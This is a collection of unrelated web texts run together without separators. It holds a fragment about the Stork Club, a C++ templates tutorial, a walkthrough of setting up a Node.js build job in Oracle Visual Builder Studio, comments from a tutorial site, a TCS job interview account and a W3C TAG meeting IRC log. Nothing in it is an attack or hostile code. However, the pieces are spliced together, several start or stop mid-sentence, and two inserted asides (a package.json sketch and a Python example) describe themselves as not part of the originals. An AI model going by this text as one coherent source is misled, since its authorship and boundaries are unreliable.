screenplay, written by Maxwell Anderson, was based on a true story originally published in Look magazine.
The Stork Club was featured in the second season episode of AMC's drama series Mad Men titled "The Gold Violin." The club provided the setting for a party attended by Don and Betty Draper in celebration of comedian Jimmy Barrett.
http://wiki.xiaoyaozi.com/en/Stork_Club.htm
Storing Your Data in C++ Standard Library Containers

- Introducing the Vector
- Demonstrating Vectors
- Summary

If you've worked with some of the newer high-level languages such as Python or PHP, you might have become a tad bit jealous of some of the fancy data structures available in those languages. For example, Python includes a handy list structure that you can put pretty much anything in. Even better, the structure is built right into the syntax of the language. Such structures that hold other data are called containers. An array is a very simple example of a container. C++, on the other hand, has its roots in C, which was a low-level language. As a result, we still don't have any high-level containers built right into the language syntax beyond simple arrays. But thanks to the ability to essentially extend the language by writing sophisticated data structures, we do have at our disposal several standard classes that serve as containers. As of 1998, these container classes are officially part of the language, even though they're not part of the syntax. Rather, they're part of the official Standard Library. But unlike languages such as Python, when you create a container in C++, you can't just put anything you want inside the container. Instead, when you create the container you specify what datatypes the container can hold. This is because, unlike other modern languages, C++ is strongly typed.

Introducing the Vector

The vector is one of the simplest containers in the Standard Library. Think of it as a souped-up array. You can store items in it just as you can in an array, except that you can manage this task more easily than with an array. Before I show you an example of a vector, however, I need to warn you: The Standard Library makes heavy use of C++ templates. If you're familiar with templates, you can skip to the next section. If you're not familiar with templates, let me give you the 60-second rundown.
Templates are not as hard to understand as people make them out to be. A template is simply a cookie cutter for a class. When you use a template, you create a new class based on a template. For example, you might have a template for a class that holds a single public member variable. This template serves as a cookie cutter by which you can create a new class. But that's boring. To liven it up a bit, let's say that the template can allow you to specify the member variable's datatype when you make your new class based on the template. Get it? The template is a cookie cutter for a class, allowing you to customize the class you're cookie-cutting. Here's a sample template that shows this concept:

template <typename T>
class CookieCutter {
public:
    T x;
};

This code isn't a class! It may look like a class, but really it's a template that you can use to create a class. The first line specifies that I have a template, and the stuff inside angle brackets says that I'll specify a type for T later on, when I create a class. The public member x doesn't have a real type yet; it just has the filler name T. Here's a program that demonstrates how to create a class based on this new template:

#include <iostream>
#include <string>
using namespace std;

template <typename T>
class CookieCutter {
public:
    T x;
};

int main() {
    CookieCutter<int> inst;
    inst.x = 10;
    cout << inst.x << endl;

    CookieCutter<string> inst2;
    inst2.x = "hello";
    cout << inst2.x << endl;
}

Inside main, it looks like I'm creating an instance of CookieCutter. But I'm not. Instead, I'm creating an instance of a class called CookieCutter<int>. That's a class that the compiler will create based on the template called CookieCutter, using the type int for the T part of the template. Thus, in the class CookieCutter<int>, the public member x is an integer. You can see that the member is an integer in the next line, where I save 10 in the member. Next, I print out the value.
Then I create an instance of a different class, this time CookieCutter<string>. This is a separate class from CookieCutter<int>, and this time the public member x is type string. You can verify this fact, because I save a string, hello, inside the member, and print it out. Thus, from this one template, I created two separate classes, CookieCutter<int> and CookieCutter<string>. Before I move on, I want to point out one important little tidbit about C++. Notice that I used the keyword typename in the first line of my CookieCutter template. If you prefer, you can use the keyword class in place of typename; it means the same thing in this context. Most people use the keyword class, but I prefer the keyword typename because it doesn't really make logical sense to say class when you're planning to specify types (such as int) that aren't classes. But that's just personal preference; use whichever you want. They work the same.
http://www.informit.com/articles/article.aspx?p=102155&amp;seqNum=3
The pipelines and other actions to take code from the programming phase to subsequent stages.

Visual Builder Studio is Oracle's counterpart to the Azure DevOps service that seems to have become more or less an industry standard. It is available for free to anyone who is a paid Oracle Cloud customer for any other service. Customers do have to pay for the compute instances that are engaged for builds and other actions. I wanted to try out this revamped service. In this article I share my first steps to get going, including a simple pipeline for testing (with Jest) and code checking (with SonarQube) a NodeJS application. The first challenge I had to overcome was to even find where and how to get an instance of Visual Builder Studio going; that was not so easy, and the documentation was not correct on this part.

Steps:
- Create an instance of Visual Builder Studio
- Configure a Git repository (in this case a public repository on GitHub)
- Create a Build VM Template for NodeJS applications
- Create a Job for building a NodeJS application, including retrieval of sources from a Git repository, checking the code quality, unit testing the code and building an artifact

Create an Instance of Visual Builder Studio

There is no entry for Visual Builder Studio in the OCI Console. It took me a while to figure this out. There is of course a way to create an instance, which I eventually managed to find and leverage. It starts with the Service User Console that can be opened from the Profile menu in the OCI Console. This console is the frontend of the Classic Cloud, or at least that is what it reminds me of. On this console, find the Visual Builder Studio service and click on this service tile. This page opens. Click on the button to create a new instance. Provide the requested details for this new instance, then press Next. An overview is presented. If you like what you see, then press Create. The instance creation is now in progress.
After a few minutes, the instance has been prepared and it can be used. Click on the instance name to access the instance. Note: I have not been able to find a way to access the VB Studio instance directly from the OCI Console. Here is the welcome screen in my brand new VB Studio instance: I am invited to set up my OCI account, so that is what I will do next. Note: I have first created an OCI Compartment for resources that I will be using (and billing for and reporting on) specifically for VB Studio. Then I proceed to set up the OCI connection in VB Studio. Note: the fact that this is needed at all is another indication that VB Studio is still not fully integrated in OCI. Click on Connect. Provide OCIDs for tenancy and user, indicate the region and provide a private key for this user. Enter the id of the compartment to use (for me the especially created compartment) and the storage namespace in OCI Object Storage. Validate the connection details. Then press Save. Click on the Projects tab. Then click on Create to create the new project. Provide name and details for the new project. Click on Next. Select the Wiki Markup style. Then press Finish. The Project is then initialized; this will take 20-40 seconds. We can now get going for real in the project environment that is now available to us. We can create issues and boards. We can configure Git repositories and Docker image registries, as well as the Maven and Gradle repositories and the NPM registry. And we can define Jobs and Pipelines to automate build, delivery and deployment actions.

Configure a Git repository in the VB Studio project

VB Studio provides its own Git repository infrastructure. We can create repositories in the context of a project. Alternatively, we can make use of external Git repositories. These can be mirrored into an internal (read only) Git repo inside VB Studio, or in build jobs we can refer directly to the URL of a public Git repository.
When a repo is mirrored, VB Studio will periodically poll the external repository and synchronize recent changes to the local mirror. Unfortunately, VB Studio cannot currently be triggered through WebHooks to immediately synchronize upon a commit. In this article, I will work with a public GitHub repo and not make use of mirroring: .

Create a Build VM Template for a NodeJS application (to use for instantiating a build server)

Before you can create a Build step that uses Node.js, you must create a Build VM template that includes the Node.js software and add a Build VM that uses that Build VM template. The template can be created from scratch or software can be added to an existing template. When you create a Build VM template, VB Studio adds Java and some required software packages to it. These default software packages are called Required Build VM Components. If you need more software packages in the VM template, you can add the packages from the VB Studio Software Catalog. Select the Organization tab. Then select the Virtual Machine Templates tab. And click on Create Template. Enter the name and a description of the new template. Press Create. The new VM Template is created, with default software assigned to it. Press Configure Software to open the page where specific software required for building the application can be added to the template. Add the Node.js 14 software package. Then press Done. See this piece of documentation on managing Build VM Templates.

Add a Build VM for Building Node.JS applications

To add a Build VM, you specify:
1. The Build VM template for Node.js applications. When a Build VM starts, VB Studio installs the operating system and the Node.js 14 software I've defined in the template on the VM.
2.
3. The VM's shape. A shape is a template that determines the number of CPUs, amount of memory, and other resources allocated to a newly created instance. To learn more about shapes, see VM Shapes.
4.
Open the Virtual Machines tab.
In the popup, select the OL7 for NodeJS template. All default values are fine: Quantity, Region, Shape and VCN Selection. This will use the VCN that was created when the OCI Connection was set up for this VB Studio instance. Press Add. The VM is now added to the pool of build machines that this VB Studio instance can pick from. The VM will be started when a job is scheduled for execution; this will take some time. You can also start the VM explicitly.

Configure SonarQube Server

I would like to make use of SonarQube for scanning the code and assessing its quality. VB Studio does not provide a SonarQube server. We need to make sure we have our own SonarQube server running somewhere; if we have the URL and other details, we can register this server with VB Studio and use it in our build jobs. Note: in my earlier article I demonstrated how to run a SonarQube Server in a Docker Container on an OCI Always Free VM. On the Project Administration page, click on Builds. Then select the SonarQube Server tab. Enter the details for the SonarQube Server.

Create a Job for building a NodeJS application

Creating a Job (definition) is done from the Builds tab. Just click on Create Job. Enter the name of the Job (in my case Build Probe, because this job will build my Probe function) and select the Build VM Template to use: the new OL7 for NodeJS template. Click on Create. Next, click on Configure. On the Job Configuration pane, select the Git tab and add a Git repository. The form appears for configuring a Git repository. This configuration step took me quite some time. The URL for the remote GitHub repo can be taken from Code | Clone HTTPS URL, and should include the .git extension. The default value for the Branch or Tag field in Visual Builder Studio is master. However, in my case (as in most, I think) the main branch is called main. You need to ensure the correct value for this field is set.
On the tab Before Build, we can define various actions to execute before the actual build job is started, but after the sources have been fetched from the Git repository. Here I have configured two of these: Configure SonarQube Server and perform Dependency Vulnerability Analysis. The former makes sure that environment variables are set with the SonarQube Server details, and the latter inspects dependencies, such as NPM modules in my Node application, for known vulnerabilities. See documentation. Next, open the Steps tab. Here we can define the actual actions to be performed during the build. I will create a step of type (UNIX/Linux) Shell Script to work with NPM: running the tests, running the sonar scan, and possibly inspecting and manipulating the code in other ways (ESLint, for example). The shell actions are fairly simple:

cd probe        # change into the directory that contains the resources for the Probe application
npm install     # install all npm dependencies
npm run test    # run the tests (through Jest) for the application
npm run sonar   # run the sonar scan and publish both the scan and test results to the SonarQube server

Finally, to finalize the definition of the job, open the After Build tab. We can define several types of actions to have Visual Builder Studio take after the build steps are done. I was hoping that VB Studio could publish the SonarQube scan results to the server, but it seems not to be able to do so for a NodeJS application. The publication to the SonarQube Server is now done by the npm run sonar step in the Shell Script. I am still trying to find a way to have the Jest test results published in JUnit format. Hopefully I can then make use of the JUnit Publisher action available in the After Build tab. One other common After Build action is Artifact Archiver. This is used to bundle build products into an archive that is retained in the job run. Archived artifacts can be downloaded manually or used as input for other jobs.
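For npm run test and npm run sonar to work at all, the probe application's package.json has to define those scripts. A hypothetical sketch, not shown in the article; the jest and sonarqube-scanner dev dependencies, the version ranges, and the sonar-scan.js helper are my assumptions for illustration only:

```json
{
  "name": "probe",
  "scripts": {
    "test": "jest --ci --coverage",
    "sonar": "node sonar-scan.js"
  },
  "devDependencies": {
    "jest": "^27.0.0",
    "sonarqube-scanner": "^2.8.0"
  }
}
```

The sonar script would then invoke the scanner with the server URL and credentials read from the environment variables that the Configure SonarQube Server pre-build action sets.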
Run the Job

The Job can be automatically triggered by changes in the sources; I did not configure that for this job. Alternatively, a job can be triggered manually. Simply click on the Build Now button to start the job. When the button is clicked, the job is scheduled for execution. An executor is looked for: a build VM that is running and available to work on the job. If you are in luck, the job can be picked up right away. If not, the job will have to wait. Here is an overview of a number of executions of the job Build Probe. Not all runs were successful (color of the bars and status icons). Not all took the same time (height of the bars). We can inspect the details of a job run by clicking on the job identifier link. I can drill down on the Build Log to take a look at the step by step detailed output from the job. Links will be enabled for, for example, artifacts, JUnit test reports, SonarQube and Vulnerabilities, if these are applicable. In this case, unfortunately, VB Studio does not know about the SonarQube Scan and Reporting that my Job has performed, so no link is available to the SonarQube Server, even though the results of the Job have been published and can be inspected on the SonarQube Dashboard, and specifically the test results. I am not sure why the Artifact is not available. There is no reference in the build log to the post build action to archive the build results into an Artifact, and there is no link to the Artifact. I also do not know why the Vulnerabilities link is not enabled; even if there are no vulnerabilities, the scan was performed and the result should be reported.

Conclusion

Visual Builder Studio is a fairly intuitive environment. It was not too hard for me to get started. With a code base on GitHub, creating a Job to test and QA my application was fairly simple. However, it seems that VB Studio is much more geared towards Java (Maven and Gradle) applications and is not [yet] up to speed with my Node application.
Getting SonarQube results, Test Reports or Artifacts to download does not seem possible at this moment. My next step will probably be an attempt to build and deploy a Function to OCI, using the Fn CLI. Since this CLI is explicitly available for creating Job Steps, I have some faith that this will go fairly smoothly. I will probably create a Pipeline with at least three jobs: one for build (test, QA, build container image for the function), one for delivery (push to Container Image Registry) and one for deploy (roll out the function to the live FaaS environment on OCI, run a test invocation).

Resources

- Oracle Cloud Documentation on creation of an OCI based instance of Visual Builder Studio
- Documentation on building NodeJS applications
- YouTube Playlist on Visual Builder Studio:
https://technology.amis.nl/continuous-delivery/get-going-with-automated-ci-cd-on-oci-in-visual-builder-studio/
Comments on this tutorial:

- haimano (August 20, 2011): i want to see that coding
- harsha.s.k (September 23, 2011): some programs have error please check
- prashant gupta (May 29, 2012): i like this subject and i am enjoying it but i am having some problem in looping so please help me. give some simple programs
- selva (July 19, 2012): very nice to handle

Related tutorials: break loops; PHP Break (break is a control structure that terminates any loop, as in for ($a=1; ...) { if ($a==5) break; else echo "$a\t"; }, which prints 1 2 3 4); Continue and break statement; Java Break while example; The break Keyword; C break continue example; Java break for loop; Break Statement in Java 7; Break a Line for text layout (the LineBreakMeasurer class); C Break for loop; HTML5 break tag <br/>; JavaScript Break Continue Statement; Break statement in Java; Java Break command; Java Break loop; Java Break Statement; Java Break keyword; Break Statement in JSP; Use Break Statement in JSP code; Java Break example; PHP line break and the nl2br() function; break and continue; What is BREAK?; Java Break out of for loop; C Break with Switch statement.

Post your Comment
http://roseindia.net/discussion/23050-Java-Break-example.html
TCS Interview Experience

Technical Round: After clearing TNQT 2020, I got an interview call from TCS at Gitanjali Park, Kolkata. In my panel, there were two panelists (probably TR and MR), but both asked me technical questions.

- What type of songs do you listen to?
- Why this type of song?
- Asked about my projects in detail. Asked me to explain each of my projects with diagrams and code.
- What is an anomaly?
- What are the types of anomalies? Explain with an example.
- How to avoid anomalies?
- DDL, DML commands
- Drop, Delete and Truncate difference.
- What is a schema?
- What is a table definition?
- What is a namespace in Python?
- What is a view?
- One interviewer drew two tables and asked me to write the view query.
- What is data redundancy?
- How can data redundancy lead to data inconsistency? Explain with an example.
- He wrote one array and one intermediate step of a merge sort algorithm, then he asked me to explain how the "Merge" function would work after that step.

HR Round: That HR guy grilled me a lot. He told me about the bond and service agreement, eligibility, etc. Then he asked me why I would not go for CTS and why TCS? CTS was giving a higher package than TCS (he knew there was a CTS drive in our college before the TCS interview). On this topic alone, 20 minutes went by. Worst HR experience ever.
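One of the questions above, "What is a namespace in Python?", can be answered with a short sketch (my own illustration, not part of the interview):

```python
# A namespace in Python is a mapping from names to objects. Modules,
# functions, and classes each introduce their own namespace.
import math

x = "module-level"           # lives in this module's global namespace

def f():
    x = "function-local"     # a separate binding in f's local namespace
    return x

print(f())                   # function-local
print(x)                     # module-level -- the global name is untouched by f
print(math.pi > 3)           # True: math's namespace is reached via attribute access
```

Because the two bindings of x live in different namespaces, the assignment inside f never touches the module-level name.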
https://www.geeksforgeeks.org/tcs-interview-experience-3/
IRC log of tagmem on 2002-04-29 Timestamps are in UTC. 14:19:36 [RRSAgent] RRSAgent has joined #tagmem 14:19:40 [Zakim] Zakim has joined #tagmem 14:20:58 [Ian] Ian has changed the topic to: TAG teleconf 14:21:30 [Stuart] Stuart has joined #tagmem 14:24:40 [Stuart] zakim, who is here 14:24:41 [Zakim] Stuart, you need to end that query with '?' 14:24:47 [Stuart] zakim, who is here? 14:24:49 [Zakim] sorry, Stuart, I don't know what conference this is 14:25:04 [DanCon] Zakim, this is tag 14:25:05 [Zakim] ok, DanCon 14:25:09 [DanCon] Zakim, who's here? 14:25:11 [Zakim] I see ??P29 14:25:39 [Stuart] Hiya Dan 14:25:52 [Stuart] zakim, ??P29 is probably me 14:25:53 [Zakim] +Stuart?; got it 14:26:47 [Norm] Norm has joined #tagmem 14:27:13 [DanCon] Stuart, I did some scribbling in , but didn't make any really interesting progress. 14:28:41 [Chris] Chris has joined #tagmem 14:29:01 [Zakim] +N.Walsh 14:29:32 [Stuart] Ok... maybe we can get a quick update. Also, do you think it would be useful to discuss Larry's proposal? 14:30:00 [Ian] /me will be there in 1 minute 14:30:28 [Stuart] 14:31:00 [Zakim] +ChrisL 14:31:07 [TBray] TBray has joined #tagmem 14:31:18 [Norm] 0824, Dan 14:31:59 [Norm] zakim, who's here? 14:32:01 [Zakim] I see Stuart?, N.Walsh, ChrisL 14:32:03 [Zakim] +DanC 14:32:04 [Chris] Zakim, who is here? 14:32:05 [Zakim] I see Stuart?, N.Walsh, ChrisL, DanC 14:32:14 [Zakim] +??P34 14:32:23 [Norm] zakim, p43 is Roy 14:32:25 [Zakim] sorry, Norm, I do not recognize a party named 'p43' 14:32:27 [Chris] Zakim, ??P34 is Roy 14:32:28 [Zakim] +Roy; got it 14:32:46 [Norm] Yes, DanCon is right. I let my pilot remember, not Zakim, that's all. 14:33:28 [Zakim] +TBray 14:36:31 [Zakim] +Ian 14:36:53 [Ian] Regrets: PC, TBL 14:36:56 [Ian] zakim, who's here? 14:36:57 [Zakim] I see Stuart?, N.Walsh, ChrisL, DanC, Roy, TBray, Ian 14:37:28 [Ian] SW: Minutes accepted for 22 April: 14:38:33 [Ian] IJ: I propose to drop arch doc progress since I've made none. 
14:39:15 [Ian] SW: General question about TAG agenda; driven from proactive to reactive. 14:39:27 [Ian] ...do others feel they'd like the balance to be more active than reactive? 14:39:32 [Ian] RF: I'd rather be working on the document. 14:39:46 [Ian] TB: It's important to not let the arch doc languish. 14:39:49 [Ian] CL: Agreed. 14:39:50 [Chris] agree 14:40:08 [Ian] TB: Let's put that on ftf agenda: 14:41:46 [Ian] IJ: I ack the problem of my inavailability these days. 14:42:01 [Ian] [FTF AGENDA: Unplugging IJ the bottleneck. :)] 14:42:22 [Ian] TB: IJ is not de facto available; what should we do? Should we do some of the editing ourselves? 14:44:28 [Ian] CL: It would give IJ less work if we polish our own sections. 14:45:26 [Ian] NW: With respect to: 14:45:38 [Ian] NW: My efforts petered out since I haven't heard consensus of opinion on some piecs. 14:45:45 [Ian] s/piecs/pieces/ 14:45:54 [DanCon] I'm quite happy with folks writing their own opinion and asking if other folks agree, Norm. 14:46:31 [Ian] CL: Not clear whether this section is addressing just "document-like" resources or all resources. 14:46:47 [Ian] NW: Trying to address all resources. Not sure that document v. data is useful architecturally. 14:47:36 [Ian] IJ: XAG 1.0 finds interesting to distinguish data-centric and user-centric content; but no formal distinction. 14:48:02 [Ian] SW: What about RF's writing on application state? 14:48:07 [Ian] 14:48:20 [Ian] RF: TBL, IJ, RF talked about this section. 14:48:29 [DanCon] ACTION Norm: take another pass over "what does a document mean" before the f2f" 14:48:48 [Ian] RF: Ball is in IJ's court. 
14:48:57 [Ian] ------------------ 14:49:01 [Ian] Action item review: 14:49:04 [Ian] Closed: 14:49:11 [Ian] IJ: Publish draft finding on Media-Types (after edits) 14:49:26 [Ian] See comments from SW: 14:49:41 [Ian] 14:49:51 [Ian] CL: Prioritize comments on Guidelines for the use of XML in IETF protocols 14:50:10 [Ian] (CL will read these in other agenda items) 14:50:24 [Ian] Pending - DC: Write more on whenToUseGet 14:50:35 [Ian] ----------------------------- 14:50:39 [Ian] New issues 14:50:50 [Ian] 1) Review charmod lc2 14:50:54 [Ian] 14:51:00 [Ian] 2) Qnames as ids 14:51:06 [Ian] 14:51:15 [Chris] Get url of document from 14:51:21 [Ian] * Charmod 14:51:25 [Stuart] q? 14:51:36 [Zakim] +DOrchard 14:51:37 [Chris] q+ 14:51:38 [Ian] RF: Covers character requirements for every protocol. It's architectural in that it touches everyone. 14:52:27 [Ian] CL: Charmod introduces ability to put unicode-encoded URI ref in a document. Makes it a req that protocols say when it happens. 14:52:42 [Ian] ...Stuff you send over the wire is percent-encoded. But you can put company names in URIs. 14:53:03 [Ian] ...(e.g., on the side of a bus). Conversion to percent (hex) encoding doesn't change what goes over the wire. 14:53:06 [DanCon] I don't agree with the summary that Chris just gave. 14:53:25 [Ian] RF: I don't think that IRI will exist for long; not integrated in the URI draft. 14:53:53 [Ian] RF: I was opposed to IRI four years ago because they wanted to integrate it before having implementing it. 14:53:54 [David] David has joined #tagmem 14:53:55 [Ian] q? 14:54:25 [Ian] CL: This doc has several sections. Section 3 is on characters. With the exception of sorting, the entire section is a description of current practice. 14:54:57 [Ian] ...very good that all this is gathered into one place. 14:55:12 [Ian] CL: Normalization stuff is contentious but has benefits. 14:55:19 [DanCon] I sure wish they'd split the document. Hmm... I wonder if I asked them for that in so many words. 
14:55:45 [Ian] CL: I with they'd split it up too 14:55:53 [Ian] CL: I recommend that the TAG review this document. 14:55:58 [DanCon] I 2nd the request to review 14:57:10 [Ian] IJ: What makes this document different from xforms? Significant impact on other work? 14:57:11 [Ian] CL: YEs. 14:57:39 [Ian] NW: I've committed to review for XML Core. I will send my comments to both core and tag. 14:57:46 [Ian] DC: Please tune your head differently for two reviews. 14:58:03 [Ian] CL: I volunteer to review and act as a liaison and coordinate comments. 14:58:23 [Ian] Action CL: Respond affirmative to Misha Wolf's request to review. 14:58:28 [Ian] DC: Deadlines? 14:58:39 [Chris] ACTIOn CL confirm with Misha that TAG will review entire document 14:59:09 [Ian] Yes. 14:59:12 [Chris] Last Call period begins 30 April 2002 and ends 31 May 2002. 14:59:29 [Ian] Action IJ: Add as issue charmod-17 14:59:32 [Ian] ----------- 14:59:36 [Ian] Qnames as Identifiers 14:59:41 [Ian] 14:59:43 [DanCon] hmm... TAG to finish its charmod review by 31 May? I doubt it. 14:59:55 [Ian] CL: I'm seeing increasing use of qnames as ids. 15:00:42 [Ian] CL gives some scenario that scribe missed: essentially, "Qname is a URI/name pair" 15:00:49 [Ian] ack Chris 15:00:59 [Ian] SW: Is there a new issue here? 15:01:16 [TBray] q+ 15:01:22 [Ian] ack DanCon 15:01:56 [Ian] DC: I think there is an issue. I think it's a myth that one can rewrite prefixes when one copies part of an xml doc from one section to another. 15:02:01 [Ian] ack TBray 15:02:40 [Ian] TB: For the record - I argued intensely when James Clark wrought this on the world that this was the wrong thing to do. I lost that argument. Now that the genie is out of the bottle, I'm not sure what we can say useful about it. 15:02:42 [Norm] q+ 15:03:02 [Ian] TB: There seems to be consensus that at the end of the day a qname is a URI/local name pair. What else needs to be said? 15:03:20 [DanCon] I gather Tim Bray's argument can now be summarized as 'I told you so.' 
15:03:35 [Ian] TB: A qname is a prefix plus a string of characters. 15:03:42 [Ian] CL: What issues bit us? 15:03:48 [Chris] q+ 15:03:50 [Ian] TB: Bit us in the DOM. 15:04:06 [Ian] NW: I agree with TB - shouldn't have done this in the first place. But now we need to move on. 15:04:22 [DanCon] well, as to what we can do about it, I think we can say 'this sucks; sorry; deal; don't expect things to work nicely. 15:04:24 [Ian] CL: We can say: 15:04:26 [DanCon] ' 15:04:32 [Ian] a) Yes it's ok to use them 15:04:39 [Ian] b) We recommend that you use them. 15:05:02 [Ian] SW: I'm hearing making this an issue and issuing a finding? 15:05:09 [Ian] q? 15:05:13 [Ian] ack Norm 15:05:14 [Norm] ack norm 15:05:20 [Ian] DC: There's a lot of experience. We can condense it. 15:05:33 [Ian] DC: Not everyone knows the plusses and minuses. 15:05:43 [Ian] CL: Yes, I think a finding would be useful. 15:05:53 [Ian] SW: Volunteers? 15:06:25 [Ian] Resolved: Accept qnameAsId-18 as issue. 15:06:42 [Ian] Action NW: Draft a finding explaining advantages and disadvantages. 15:06:50 [Ian] CL: Keep it neutral - legal but pros and cons. 15:07:00 [Ian] DO: So it's not really an arch recommendation... 15:07:06 [DanCon] order, Stu, we're done accepting this issue 15:07:13 [Ian] q+ 15:07:19 [Ian] ack Chris 15:07:24 [Ian] ack Ian 15:07:38 [Ian] Norm, I recommend including examples (in general in fact) of bad usage (and good). 15:07:56 [Ian] Action IJ: Add issue to issues list. 15:07:58 [Ian] --------------------------- 15:08:47 [Ian] Finding: 15:09:07 [Ian] RF notes that IE Mac crashes on this document. 15:09:14 [DanCon] ooh, TimBray, I'm interested in clues on choosing which mozilla to use on a mac 15:09:21 [Ian] DC: I move we accept this draft. 15:09:26 [Ian] RF: I agree with SW comments (on tag@w3.org) 15:09:47 [Ian] 15:10:10 [Ian] SW summary of comments: 15:10:21 [Ian] 1) s/resource/response. Found this a bit jarring. 15:10:25 [Ian] CL: I agree with this. 
15:10:52 [Ian] DC: The last meeting said "resolved s/resource/response" 15:11:05 [Ian] TB: The point was that we were talking about the bits received. 15:11:27 [Ian] DC: What IJ wrote is what I would have expected based on our meeting of last week. 15:11:43 [DanCon] [[ 15:11:43 [DanCon] Resolved: 15:11:43 [DanCon] 1. Publish this finding as accepted, without ns dispatch section, and having fixed charset sentence (s/resource/response). 15:11:47 [DanCon] ]] -- 15:11:52 [Ian] RF: This is wrong. 15:12:22 [Ian] RF: The finding says that representations only exist in responses. We're talking about media types. 15:12:41 [Ian] CL: Don't imply that some things only are found in responses. 15:13:02 [Ian] TB: I request that we take more time to review offline. 15:13:35 [Chris] url to read? 15:13:36 [Ian] DC: How do we make progress on this? 15:13:50 [Ian] 15:13:56 [Ian] Wrong uRI 15:14:09 [Ian] Read: 15:14:16 [Ian] Last modified: $Date: 2002/04/25 17:06:19 $ 15:14:19 [Ian] ---------------------------- 15:14:22 [Ian] FTF meeting agenda 15:15:26 [Ian] DC: TimBL on holiday this week. 15:15:40 [Ian] SW: Agenda suggestions? 15:15:52 [Ian] TB: Two things I'd like to accomplislh: 15:16:14 [Ian] a) Meta-work on arch document. Style, structure. I'm not satisfied with progress thus far. 15:16:35 [Ian] b) I'd like to drive a stake through whenToUseGet-7. 15:17:16 [Ian] TB: Soap 1.2 is going to go to last call soon. I suspect that at least TBL, RF, and I will have some issues about what's in there. 15:17:43 [Ian] TB: I'd like to be proactive, read SOAP 1.2, and identify architectural issues, come up with an action plan (who does what when). 15:18:03 [DanCon] if there's a suggestion to read "soap 1.2", please include dates and URIs of the specs; I gather the published /TR/ for SOAP isn't the thing to read. 15:18:16 [Ian] NW: I'd like progress on arch doc. Let's use ftf time to make progress on that and slow issues. 15:18:21 [Ian] DO: Sounds fine so far. 15:18:30 [Ian] RF: Already covered. 
15:18:34 [Ian] CL: Already covered. 15:18:53 [David] Why is Ian crying? 15:18:56 [Ian] ;) 15:19:22 [Ian] DC: Mixed namespaces, if only to show ourselves that we won't make progress. 15:19:50 [Ian] Action SW and IJ: Work on ftf agenda. 15:19:55 [Ian] ======================== 15:20:03 [DanCon] Ian's falling on his sword cuz he sees himself as a bottleneck on the arch document, but Tim Bray was careful to say "I think it's important and I'm not satisifeid with the progress *we* are (not) making on it" 15:20:04 [Ian] 1. Guidelines For The Use of XML in IETF Protocols IETF best practices draft requiring URNs for XML namespaces in IETF documents. 15:20:04 [Ian] Action to take? 15:20:10 [Stuart] q 15:20:12 [Stuart] q? 15:21:00 [Ian] CL: Some comments on guidelines from editors suggest some fixes will take place (but wouldn't have occurred if charmod already a Rec) 15:21:25 [Ian] CL: Also, they say "should be well-formed". No. Must be well-formed. 15:21:28 [DanCon] (alread a REC *and* widely read and understood; unfortunately we can't publish directly into developer's minds) 15:21:38 [Norm] What Chris said, +100 :-) 15:21:51 [Ian] CL: I don't want a protocol coming out of IETF saying "Should be well-formed...." 15:21:56 [Ian] TB: Absolutely. 15:22:20 [Ian] SW: They expect to "roll a new one" in a week or two. 15:22:36 [Ian] TB: Larry Masinter has asked us to postpone discussion. 15:22:49 [Ian] LM: New draft expected "in a couple of weeks" 15:23:21 [Ian] 15:23:49 [Ian] SW: We will postpone discussion until that draft ready. 15:24:02 [Ian] -------------------------------- 15:24:18 [Ian] whenToUseGet-7 Review revised Finding, TAG consensus? ( 15:24:18 [Stuart] q+ 15:24:22 [Stuart] q- 15:24:31 [Ian] Draft findings: 15:24:34 [Chris] 15:24:49 [Ian] DC: See "Fodder" at bottom 15:24:53 [Ian] (of document) 15:25:43 [Ian] DC: See email from LM 15:25:55 [Ian] DC: I like this. 15:26:00 [Ian] TB: I think close to DC's version. 15:26:30 [Stuart] q? 
15:26:36 [Ian] TB: Would you redraft your language using LM language? 15:27:00 [Ian] DC: Original findings didn't make the case for what you lose when you don't use get. I would add examples. 15:27:21 [Ian] DC: Also, the "browsers v. clients" distinction I don't agree with. I wanted to make this case. 15:29:12 [Ian] CL: If I bookmark results of submitting a form, I don't want the form posted again. I just want a URL to tracking info. In other cases, I do want form to be resubmitted each time. There are cases for each. 15:29:40 [Ian] TB: When you buy a book, for the safety criterion, this has to be done with a post anyhow. I think we are mixing the issues here. 15:29:51 [Ian] DC: LM pointed out that POST response can give a content location. 15:30:01 [Ian] TB: That's a safe way that's playing by the rules. 15:30:10 [Ian] RF: It isn't necessary to be limited to content location. 15:30:44 [Ian] CL: I'd like to have the option of bookmarking a post (when posts are safe). 15:30:50 [Ian] DC: If safe, shouldn't have been a POST. 15:30:55 [Ian] CL: Where do you put the message body? 15:31:11 [Ian] TB: If too complex, existing GET machinery probably not enough. Use Post. 15:31:21 [Ian] CL: Bad to crunch message bodies into percents. 15:31:25 [Ian] DC, TB: Why? 15:31:36 [Ian] CL: No meaning of bytes in URI space. 15:32:35 [Ian] RF: In practice, the only problem is when the char encoding is transcoded at some point. The body no longer corresponds to the same octets the server had. 15:32:36 [DanCon] Ian, don't try to minute this line by line. 15:32:40 [Ian] CL: I disagree with that. 15:33:26 [Ian] TB summarizing: CL is objecting to the utility in the general case of doing GETs on URIs that have complex args due to I18N issue. 15:33:39 [Ian] TB: Is that orthogonal to the main arch issue we are discussing? 15:33:56 [Ian] CL: No, since this is telling people to use something that's broken. 15:34:11 [DanCon] I don't think anything's broken. 
15:34:32 [Ian] TB: Two sides to this - if you push web to post space, you lose a lot of benefits (e.g., application of crawlers, bookmarks, ...). 15:34:38 [Ian] TB: Isn't a better solution to fix the I18N solution. 15:34:39 [Ian] CL: Yes. 15:34:46 [DanCon] servers define the meaning of all URIs, not just ones with non-ascii form responses. 15:35:06 [Ian] CL: I still think kind of broken to percent-encode a document and stuff into a URI... 15:35:21 [Ian] DC: I can make same argument against pointy brackets... 15:35:44 [Ian] CL: If we recommend something, indicate corresponding drawbacks. 15:36:26 [Ian] DC: Do you agree with principle to use get for safe operations? 15:36:42 [Ian] CL: Yes, unless strong reasons to the contrary. 15:36:49 [Ian] TB: That's why it's "should". 15:36:57 [Chris] yeah, okay 15:37:04 [Ian] TB: I think DC's original document was sounds, and that DC should incorporate suggested improvements. 15:37:21 [Ian] RF: I'd like to refocus on the issue of "All important resources should have URIs." 15:38:13 [Ian] DO: Before getting closure here, how is this finding to be used? 15:38:21 [TBray] q+ 15:38:34 [Ian] DO: What is Web services to do with this? 15:39:01 [Ian] TB: Yes, I agree - some of our findings will be impactful on ongoing work. I think we need to be explicit about intended consequences. 15:39:25 [Chris] q+ 15:39:26 [Ian] DC: I'd like SOAP primer to say "At this time we don't have GET, so for safe operations don't use SOAP." 15:40:02 [Ian] 